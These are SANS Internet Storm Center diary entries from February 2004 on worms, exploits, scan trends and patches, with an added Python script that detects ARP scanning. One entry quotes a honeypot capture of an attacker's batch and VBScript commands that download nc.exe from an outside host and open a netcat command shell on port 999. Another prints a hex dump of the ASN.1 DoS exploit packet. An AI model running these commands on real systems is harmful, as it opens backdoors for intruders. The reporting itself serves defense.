Diaries

Published: 2004-02-29

WFTPD unpatched exploit and potential DDoS against anti-spyware forums


K-OTik Security submitted information regarding a WFTPD Server / WFTPD Pro Server exploit. This is an overflow that can allow a logged-in user to run arbitrary code as SYSTEM or as the user that started WFTPD (depending on the version). More information:

http://lists.netsys.com/pipermail/full-disclosure/2004-February/018031.html

There's already an exploit for this, and the developer hasn't released a patch for the tested versions (3.21 & 3.10, both regular and Pro versions).

-----

Someone pointed out that at least one of the anti-spyware forums has been having problems with DoS attacks. More information can be found at:

http://www.netrn.net/spywareblog/

See the Feb 16th entry.

Handler on Duty (substituting for Lorna Hutcheson)
Davis Ray Sickmon Jr, Midnight Ryder Technologies ( http://www.midnightryder.com )

0 Comments

Published: 2004-02-28

Backdoors left behind by worms; DHCP connection

Backdoors left behind by worms

With the increase of worms opening backdoors on infected systems, scanning on ports 80, 135, 445, 1080, 3127, 3128 and 10080 remains high. In particular, this could be due to the Welchia and Mydoom worms. The latest Beagle worm opens a backdoor on port 2745.

DHCP connection

A gentle reminder that when you have a DHCP address from your ISP, you will likely receive garbage destined for the previous owner for up to several hours after you connect. This is because of P2P and other applications unaware that the IP was dynamically assigned.

0 Comments

Published: 2004-02-27

Updated: Bagle C Virus. New Vulnerability in RealSecure and BlackIce Products, Solaris 8 and 9 passwd(1) bulletin, WinZip flaw, IE cross-frame scripting issue

Bagle C

Just in: A new virus, apparently part of the Bagle family, was sighted. The virus is not detected by common AV products at this point. It uses .zip attachments. First sightings were reported around 5-6 PM EST (10-11pm UTC).


New Vulnerability in RealSecure and BlackIce Products

eEye Security released a bulletin last night with details concerning a serious vulnerability in RealSecure/BlackICE Server Message Block (SMB) Processing. Details are at


http://www.eeye.com/html/Research/Advisories/AD20040226.html

According to eEye, only one SMB packet is required to exploit this vulnerability. The issue is with the way that an SMB packet is processed, analyzed, and reassembled. It is during this phase that specially crafted data can be passed to an improperly checked heap-based buffer. Such a heap overwrite can lead to reliable remote code execution. No known proof of concept or other public exploit is in current circulation; however, systems running either of these products should be patched immediately.


Updates for these products are available from ISS at


http://www.iss.net/download/

Solaris 8 and 9 passwd(1) privilege escalation

Yesterday, Sun released a bulletin announcing a patch to a potential privilege escalation vulnerability in the passwd(1) program in certain versions of Solaris 8 and 9 (Solaris 7 is not vulnerable). Complete details are at


http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57454&zone_32=category%3Asecurity

Solaris admins should read the bulletin and patch as soon as practical.


WinZip MIME parsing buffer overflow

iDefense published a bulletin today describing a vulnerability in the popular WinZip utility, including WinZip 9 beta and WinZip 8.1 SR-1, though not the WinZip 9 final release. It is believed that earlier versions are also likely to be vulnerable. This vulnerability is in the MIME parameter parsing routines of WinZip. One workaround involves disabling the extension handlers for certain vulnerable file types to prevent exploitation by double-clicking on archives. Unlike many of the recent worms, where infection required opening a document within a .zip attachment, this one could be exploited simply by opening the archive to see what was inside. As always, users are urged to be extremely cautious when opening e-mail attachments. Note that exploitation is also possible via web links or peer-to-peer file sharing. More details can be found here:


http://www.idefense.com/application/poi/display?id=76&type=vulnerabilities&flashstatus=false


IE cross-frame scripting exposure

iDefense also published a bulletin today describing a cross-frame scripting vulnerability in patched versions of Internet Explorer. While exploitation requires a user to click on a link, when coupled with the vulnerability described in Microsoft's bulletin MS04-004, the user may not actually be aware that they are following a link to a malicious web site and may inadvertently supply sensitive personal information to unintended parties. IE users should be sure to apply the patch described in MS04-004 and then should verify the address of the web site in the address bar before supplying personal information in web forms. Complete details can be found here:


http://www.idefense.com/application/poi/display?id=77&type=vulnerabilities&flashstatus=false



---Jim Clausing

0 Comments

Published: 2004-02-25

New virus, exploits, and old tricks.


We received several reports of strings in web server logs that look like WebDAV exploit code; the reported string is a repeated series of 02 1b 02 1b. We have not been able to get any packet captures of this. If you get one, please send it to us.

A new version of the Netsky virus, Netsky.c, is making its rounds. It spreads via email and entices the user to open it with suggestive content. More information:

http://vil.nai.com/vil/content/v_101048.htm

We have received a report of “missing email attachments”. Johannes suggested: “Due to a recent flood of new viruses, many organizations are re-evaluating their e-mail policy and as a result strip any attachment, not just attachments that are known to be viruses.”

We have received more reports of the Ipswitch iMail LDAP exploit being seen in the wild. George Bakos offered: “If anyone wants full binary captures of this stuff in the wild, I've been seeing it in my various thp (tiny honey pot) hosts since 2/19.”

0 Comments

Published: 2004-02-24

ICQ-Based Bizex Worm, MyDoom.F, Checking Your Server Logs

ICQ-Based "Bizex" Worm

-----------------------------------------------------------

A new Win32 worm, aimed at users of the ICQ messaging software, is making the rounds. The worm, dubbed "Bizex," is loaded onto a machine using a combination of ICQ behaviors and vulnerabilities in Internet Explorer and Windows when a user visits the site www.jokeworld.biz (currently unresolvable). Once executed, the worm then sends messages to ICQ contacts suggesting that they visit the JokeWorld site. The worm reportedly searches infected machines for specific financial information and installs a keylogger in an attempt to steal passwords. More information:



http://www.techweb.com/wire/story/TWB20040224S0006





MyDoom.F

-----------------------------------------------------------

Proving once again that human gullibility knows no bounds, the MyDoom.F email-based worm is slowly increasing in "popularity." Unlike its kinder and gentler MyDoom siblings, this one not only installs a backdoor and mailbombs the known world, but it has a nasty habit of randomly deleting files with specific extensions. More information:



http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MYDOOM.F



http://us.mcafee.com/virusInfo/default.asp?id=helpCenter&hcName=mydoom_f





Checking Your Server Logs

-----------------------------------------------------------

Earlier, we received a report from an admin who, looking through his webserver logs, was able to identify a compromised system that had been used as a "toolz" dump. This highlights, once again, the importance of regularly examining your web server logs for signs of malicious activity and following up on what you find there. Thanks to this admin's efforts, the owners of the compromised system were contacted and the dump was taken offline.



If you're not regularly checking your webserver logs, or if you're not sure what to look for, here is an excellent guide that explains not only what to look for, but also explains why it's important.



http://www.securiteam.com/securityreviews/6H00C1535K.html





-----------------------------------------------------------

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-02-23

Ipswitch iMail LDAP Exploit Correlation, Port 3991 activity request

Ipswitch iMail LDAP Exploit Correlation

The packet captures we've received have allowed us to correlate the increase in port 389 scanning as activity from a recently released exploit tool against the Ipswitch iMail LDAP server.

We were unable to get in touch with Ipswitch to comment on this vulnerability. Ipswitch customers using the iMail LDAP server are advised to implement filtering on port 389 until a patch is made available.

Port 3991 Captures Request

We have seen a spike in activity over the past few days on port 3991. We are looking for more full packet captures of this activity. Please compress files and send as attachments to handlers@sans.org.

--Joshua Wright/Handler on Duty

0 Comments

Published: 2004-02-22

LDAP Scan increase. Win98 ASN.1 patch, MyDoom Remover, Win98 free update CD

LDAP scan increase

We are seeing a significant increase in scans for port 389. This port is associated with LDAP. LDAP is used by a variety of different systems, in particular Windows Active Directory. At this point, it is not clear what these scans are attempting to accomplish. If you have any information, in particular FULL PACKET CAPTURES (not just firewall logs), let us know.

http://www.dshield.org/port_report.php?port=389

Update

The increase in port 389 scans is believed to be due to a new exploit against the iMail LDAP server. The exploit has been posted here:

http://www.coromputer.net/files/ldaped.c

Windows 98 ASN.1 Patch


Readers reported to our handlers team that Microsoft is distributing a patch
for the ASN.1 issue to Windows 98 users per request. If you are running Windows
98, contact your Microsoft representative for the location of the patch.

As reported earlier, the ASN.1 advisory MS04-007 only covers newer versions of
Windows. Windows 98 is however still vulnerable.

Workaround: you may want to consider renaming or removing msasn1.dll. However, please test this fix carefully as it may break some software.

Careful! Do not trust any patches sent via e-mail.

MyDoom Remover release via Windows Update


Currently, Microsoft is offering a MyDoom virus remover via its Windows Update service.


Free Windows Patch CD


Microsoft offers a free patch CD for all currently supported versions of Windows. You can order a CD here:


http://www.microsoft.com/security/protect/cd/order.asp
------------

Johannes Ullrich, SANS Institute jullrich_AT_sans.org

http://isc.sans.org/contact.html

0 Comments

Published: 2004-02-18

Netsky.b Virus / Win98 ASN.1 patch / new Mremap PoC

Netsky.b Virus


Today a new mass mailing virus was discovered. It is called Netsky.b and, according to Symantec, it uses its own SMTP engine to send itself to email addresses. It will also search all drives from C to Z, looking for "share" and "sharing" folders to copy itself into.


Symantec currently rates it Level 4 (Severe).


Reference: http://www.sarc.com/avcenter/venc/data/w32.netsky.b@mm.html





Microsoft Windows 98 Patch



A post to the Bugtraq and Full Disclosure mailing lists today reports that Windows 98 is apparently also vulnerable to the issue described in MS04-007. It is not yet clear whether a patch exists, whether it will be made available through the Microsoft Windows Update website, or how it will be delivered.
The Microsoft Security Bulletin MS04-007 does not include any reference to Windows 98, so users should, as usual, be wary of any unofficial patches for Win98.


Reference:
http://lists.netsys.com/pipermail/full-disclosure/2004-February/017520.html



Linux Mremap PoC



Proof of concept code was published on the Full Disclosure list today. The PoC tests for the new mremap vulnerability, discovered in kernel 2.4.24 and earlier.
CVE has assigned the name CAN-2004-0077 to this issue.


Please check with your Linux vendor for updates. Most of the major Linux distributions have already released patches for this vulnerability.


Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0077


-------------------------------------------------

Handler on duty: Pedro Bueno (bueno@ieee.org)

0 Comments

Published: 2004-02-17

New Mass Mailing Virus


New Mass Mailing Virus




A new mass mailing virus is spreading around the Internet today. Most of the Anti-Virus vendors are calling it Bagle.B. This virus harvests email addresses from infected computers and uses those addresses as the To: address while spoofing the From: address. The primary characteristics of the emails it sends are as follows:



* Subject: ID <random characters>... thanks

* Body:

* Yours ID <random characters>

* - -

* Thank

* Attachment: <random characters>.exe



If the attachment is opened, it will create a backdoor on tcp port 8866 and
will search 4 websites for email addresses to announce the IP address of
the infected computer to would-be hackers. Afterwards the infected
computer will start mass-mailing the virus laden emails to any email
addresses it finds on the infected computer.


Verify that your Anti-Virus software is up to date, and continue to follow safe computing practices. If you were not expecting the attachment, don't touch it.


For more technical details please check the following websites.


Symantec - http://www.sarc.com/avcenter/venc/data/w32.alua@mm.html



McAfee - http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101030

Sophos - http://www.sophos.com/virusinfo/analyses/w32tanxa.html


(or your favorite Anti-Virus Vendor's website)


Thanks to Scott Fendley for the use of this information.




New worms and viruses


Today has been a busy day for sysadmins. There has been an explosion of new worms and malware. It is important for everyone to use extreme care for the next few days as this activity shakes out.



50% Increase in Email Fraud and Phishing in January


According to an article at finextra.com, " E-mail fraud and phishing scams grew by more than 50% in January, with an average of 5.7 new, unique attacks sent out to millions of consumers each day." Check out the article at

http://www.finextra.com/topstory.asp?id=11196




Handler on Duty

Deb Hale

haled@pionet.net

0 Comments

Published: 2004-02-16

ASN.1 DoS exploit hostname resolution, Recent Scan Increases, anti spam effort

ASN.1 DoS and MyDoom.B hostname resolution

An aspect of MyDoom.B that did not receive a lot of attention was its ability to use gethostbyname() to resolve its IP and scan its LAN. A published ASN.1 DoS exploit requires the hostname to work. Resolving IP addresses to hostnames can arguably be a principal method that will be used by worms written to exploit some of the vulnerabilities described in MS04-007. This information can be used for defensive purposes. If you have not patched 100% of your MS04-007 vulnerable systems, you may find the following information published by Symantec useful today or in the near future.

An example of what the "IP to hostname" traffic may look like on a network:

"Another thing to look for is a succession of ARP requests for consecutive addresses from the same host, like this:

11:43:50.435946 arp who-has 169.254.14.115 tell 169.254.56.166
11:43:50.438301 arp who-has 169.254.14.116 tell 169.254.56.166
11:43:50.445362 arp who-has 169.254.14.117 tell 169.254.56.166
11:43:50.460087 arp who-has 169.254.14.118 tell 169.254.56.166
11:43:50.466885 arp who-has 169.254.14.119 tell 169.254.56.166
11:43:50.482358 arp who-has 169.254.14.120 tell 169.254.56.166
11:43:50.484681 arp who-has 169.254.14.121 tell 169.254.56.166
11:43:50.498546 arp who-has 169.254.14.122 tell 169.254.56.166
11:43:50.505680 arp who-has 169.254.14.123 tell 169.254.56.166
11:43:50.514562 arp who-has 169.254.14.124 tell 169.254.56.166
11:43:50.531488 arp who-has 169.254.14.125 tell 169.254.56.166
11:43:50.534873 arp who-has 169.254.14.126 tell 169.254.56.166
11:43:50.546532 arp who-has 169.254.14.127 tell 169.254.56.166
11:43:50.554933 arp who-has 169.254.14.128 tell 169.254.56.166
11:43:50.570009 arp who-has 169.254.14.129 tell 169.254.56.166
11:43:50.577407 arp who-has 169.254.14.130 tell 169.254.56.166
11:43:50.588931 arp who-has 169.254.14.131 tell 169.254.56.166
11:43:50.600770 arp who-has 169.254.14.132 tell 169.254.56.166
11:43:50.606802 arp who-has 169.254.14.133 tell 169.254.56.166"
"Detecting network traffic that may be due to RPC worms"
http://securityresponse.symantec.com/avcenter/venc/data/detecting.traffic.due.to.rpc.worms.html
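As an added example (not part of the diary or of the Symantec note), the following Python script applies the heuristic quoted above to tcpdump ARP output: it groups who-has requests by the requesting host and flags any host whose requests walk consecutive addresses. The sample capture, the eight-address threshold and all addresses in it are constructed for this example.

```python
"""Flag hosts whose ARP requests walk consecutive addresses, the pattern the
Symantec note above associates with worms resolving and scanning their LAN."""
import re
from ipaddress import IPv4Address
from typing import Dict, List

# tcpdump ARP request line in the format quoted above:
# "<timestamp> arp who-has <target> tell <requester>"
ARP_REQUEST = re.compile(
    r"^\d{2}:\d{2}:\d{2}\.\d+ arp who-has (?P<target>\d+\.\d+\.\d+\.\d+) "
    r"tell (?P<requester>\d+\.\d+\.\d+\.\d+)$"
)

# Constructed sample (not a real capture): 10.0.0.5 sweeps 10.0.1.20-29 in
# order, with one retry for .23, while 10.0.0.9 makes unrelated requests.
SAMPLE_CAPTURE = """\
09:12:01.000100 arp who-has 10.0.1.20 tell 10.0.0.5
09:12:01.000900 arp who-has 10.0.1.21 tell 10.0.0.5
09:12:01.001700 arp who-has 10.0.1.22 tell 10.0.0.5
09:12:01.002400 arp who-has 10.0.2.7 tell 10.0.0.9
09:12:01.002600 arp who-has 10.0.1.23 tell 10.0.0.5
09:12:01.003300 arp who-has 10.0.1.23 tell 10.0.0.5
09:12:01.004100 arp who-has 10.0.1.24 tell 10.0.0.5
09:12:01.004800 arp who-has 10.0.1.25 tell 10.0.0.5
09:12:01.005500 arp who-has 10.0.1.26 tell 10.0.0.5
09:12:01.006200 arp who-has 10.0.1.27 tell 10.0.0.5
09:12:01.006900 arp who-has 10.0.1.28 tell 10.0.0.5
09:12:01.007600 arp who-has 10.0.1.29 tell 10.0.0.5
09:12:02.110000 arp who-has 10.0.0.1 tell 10.0.0.9
09:12:02.110800 arp reply 10.0.0.1 is-at 00:11:22:33:44:55
"""


def parse_arp_requests(text: str) -> Dict[str, List[int]]:
    """Group who-has targets (as integers) by requesting host, in capture order.
    Replies and non-ARP lines are ignored."""
    targets: Dict[str, List[int]] = {}
    for line in text.splitlines():
        m = ARP_REQUEST.match(line)
        if m:
            targets.setdefault(m["requester"], []).append(int(IPv4Address(m["target"])))
    return targets


def longest_consecutive_run(addrs: List[int]) -> int:
    """Length of the longest run in which each request is for the previous
    address + 1. A retry for the same address does not break the run."""
    best = run = 0
    prev = None
    for addr in addrs:
        if prev is not None and addr == prev:
            continue                      # ARP retry, same address
        run = run + 1 if prev is not None and addr == prev + 1 else 1
        best = max(best, run)
        prev = addr
    return best


def sequential_arp_scanners(text: str, min_run: int = 8) -> Dict[str, int]:
    """Return {requester: longest_run} for hosts at or above the threshold."""
    flagged = {}
    for host, addrs in parse_arp_requests(text).items():
        run = longest_consecutive_run(addrs)
        if run >= min_run:
            flagged[host] = run
    return flagged


if __name__ == "__main__":
    for host, run in sequential_arp_scanners(SAMPLE_CAPTURE).items():
        print("%s walked %d consecutive addresses" % (host, run))
```

Feed it `tcpdump -n arp` output (older tcpdump prints the "arp who-has" form shown above); legitimate hosts rarely exceed a run of two or three, so the threshold mainly tunes how early a sweep is reported.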

Anti-Spam effort getting traction - SPF (It's NOT Shortest Path First)

Sender Policy Framework
http://spf.pobox.com/

SPF is an attention-getting and growing effort to fight "email address forgery and makes it easier to identify spams, worms, and viruses".

Over "7089 domains with SPF records are known".
http://spftools.infinitepenguins.net/register.php

Scans on Port 80 and 445 since last Wednesday February 11th - Welchia.B

Increased scanning activity is principally attributed to the release of the Welchia.B.Worm on or about Wednesday February 11th. ISC/DShield data indicate that there were approximately 40,000 systems scanning for Port 80 last Tuesday February 10th 2004 and that number increased over the next few days to a peak number of 377,089, a whopping increase of 337,089 systems. Over a similar time period scans of Port 445 increased from approximately 75,000 systems scanning to a peak of 331,901 on 02/15/04, an increase of 256,901 systems. Welchia.B exploits multiple Windows vulnerabilities by attacking TCP port 135, TCP port 80, and two vulnerabilities on TCP port 445. A DShield and SecurityFocus list participant, Frank Knobbe, who has been looking at the increased Port 80 scanning, had the following SecurityFocus list comments (reprinted with the author's permission) about the amount of traffic sent at webservers he monitors:

"The interesting thing is that of those 20-some packets, a lot of them do
not have shellcode included, just sleds of varying length. Seems like
the code for the WebDAV exploit is broken. Thank God for small favors...
However, it's a noisy bugger. It's approaching the level of pollution of
the SQL Slammer. Unfortunately this one can not be filtered on ISP
routers. Looks like we have to learn to live with an increasing level of
bandwidth wasted on noise like this."

Patches have been available from the vendor for some time. These scans of ports 80 and 445 are not associated with any MS04-007/ASN.1 remote exploits at this time.

Scans on Port 3127

Scans for Port 3127 dropped significantly on the date the DDoS component of the MyDoom.A worm was set to expire (02/12/04). See the graph at:
http://isc.incidents.org/port_details.html?port=3127

Published information says only the DDoS component was set to expire, so why did scans for 3127 drop significantly? It is also apparent that there is a significant effort for control of blocks of MyDoom infected systems. George Bakos and his TinyHoneyPot (THP) submitted an example:

"Some creative young soul is using the MyDoom backdoor (port 3127) to return a command shell using **editorial snip** ... netcat on port 999 **editorial snip** ......

Here's the thp capture:
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject(^"^Microsoft.XMLHTTP^"^)>>c:\madefile.vbs

echo HTTPGET.Open ^"^GET^"^, ^"^http://mitglied.lycos.de/norbertberg/nc.exe^"^, False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1 >>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2 >>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs

echo Set SendBinary = CreateObject(^"^ADODB.Stream^"^)>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile ^"^c:\nc.exe^"^, adSaveCreateOverWrite>>c:\madefile.vbs
C:\madefile.vbs

del C:\madefile.vbs
start C:\nc.exe -vv -l -p 999 -e cmd

Scans for Port 2234

Scans for Port 2234 may be associated with Deadhat and Deadhat.B which both have a component to spread through the Soulseek file-sharing program.
http://isc.incidents.org/port_details.html?port=2234

Patrick Nolan

0 Comments

Published: 2004-02-15

More on MS04-007

Port 80 and 445 activity

DShield showed a huge spike in port 80 and 445 traffic on Saturday, which appears to be slowing down again. This may have been due to scanning for (or actual denial of service attempts against) the MS04-007 vulnerability.



From the mailbag

An e-mail message making the rounds claims that the recipient is under "police investigation" and gives a link to follow for more information. This link downloads a Trojan onto the user's computer. The site (federalpolice.com) is still live at the time of this writing.



From the mailbag 2

An individual contacted the handlers asking whether or not they should call in their admin staff over the (holiday in the US) weekend to have them apply the MS04-007 patches. There are no known worms exploiting this vulnerability at this time (though one is probably only days away) and the exploit released yesterday was "only" a denial of service. Given that most organizations will block the ports used in this exploit at their firewalls, the risk is mostly from insiders. On the other hand, remember that many organizations have been hit hard by the last few significant worms even though their perimeters were reasonably secure when employees brought laptops that had been infected at home into work and plugged into company networks. Important servers should be patched as soon as possible and workstations and laptops should not be far behind. Each organization needs to do the risk analysis for itself (but the handler-on-duty's team was patching over the weekend).



---Jim Clausing

0 Comments

Published: 2004-02-14

MS04-007 Exploit released

Happy Valentines Day!

A DoS exploit has been made available using the ASN.1 bug (MS04-007). This exploit uses port 445, 139 or 135. While this is just a DoS exploit, more serious exploits may follow soon.

Note: This exploit appears to work only against Windows 2000 Professional. Don't forget history: it wasn't long after DCOM came out that we saw universal shellcode for almost all Windows platforms.


This may be your last chance to apply the patch!

(See yesterday's diary for more details regarding ASN.1)



The exploit kills lsass.exe (see definition below), fires an error message to the screen, and reboots the machine after approximately 1 minute.


According to Liutilities.com ( http://www.liutilities.com/products/wintaskspro/processlibrary/lsass/ ), lsass is:


Process File: lsass or lsass.exe

Process Name: Local Security Authority Service

Description: Windows Local Security Authority Server Process handles Windows security mechanisms. It verifies the validity of user logons to your computer or server. Technically, the software generates the process that is responsible for authenticating users for the Winlogon service.

Below are screen captures from the error log and lsass crash message:


http://isc.sans.org/images/lsasspopup.gif

http://isc.sans.org/images/errorlog.gif




20:26:04.281879 192.168.1.13.1087 > 192.168.1.11.139: tcp 1460 (DF) (ttl 128, id 438, len 1500)
0x0000 4500 05dc 01b6 4000 8006 6ffd c0a8 010d E.....@...o.....
0x0010 c0a8 010b 043f 008b e01c 2816 ab83 5c57 .....?....(...\W
0x0020 5010 4413 cd30 0000 0000 0885 ff53 4d42 P.D..0.......SMB
0x0030 7300 0000 0008 01c8 0000 0000 0000 0000 s...............
0x0040 0000 0000 0000 7503 0000 0300 0cff 0000 ......u.........
0x0050 00ff ff02 0001 0000 0000 0033 0800 0000 ...........3....
0x0060 005c 0000 804a 0860 8208 2f06 062b 0601 .\...J.`../..+..
0x0070 0505 02a0 8208 2330 8208 1fa0 0e30 0c06 ......#0.....0..
0x0080 0a2b 0601 0401 8237 0202 0aa1 0523 0303 .+.....7.....#..
0x0090 0107 a282 0804 0482 0800 4e54 4c4d 5353 ..........NTLMSS
0x00a0 5000 0100 0000 1502 0860 0900 0900 2000 P........`......
0x00b0 0000 0700 0700 2900 0000 574f 524b 4752 ......)...WORKGR
0x00c0 4f55 5044 4546 4155 4c54 4141 4141 4141 OUPDEFAULTAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0100 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0140 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0150 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0160 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0170 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0200 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0210 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0220 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0230 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0240 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0250 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0260 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0270 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0280 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0290 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0300 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0310 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0320 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0330 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0340 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0350 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0360 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0370 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0380 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0390 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
.....
Snip ... ending with this packet:
20:26:04.282134 192.168.1.13.1087 > 192.168.1.11.139: tcp 725 (DF) (ttl 128, id 439, len 765)
0x0000 4500 02fd 01b7 4000 8006 72db c0a8 010d E.....@...r.....
0x0010 c0a8 010b 043f 008b e01c 2dca ab83 5c57 .....?....-...\W
0x0020 5018 4413 4eef 0000 4141 4141 4141 4141 P.D.N...AAAAAAAA
0x0030 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0070 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0080 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0100 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0140 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0150 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0160 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0170 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0200 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0210 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0220 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0230 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0240 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0250 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0260 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0270 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
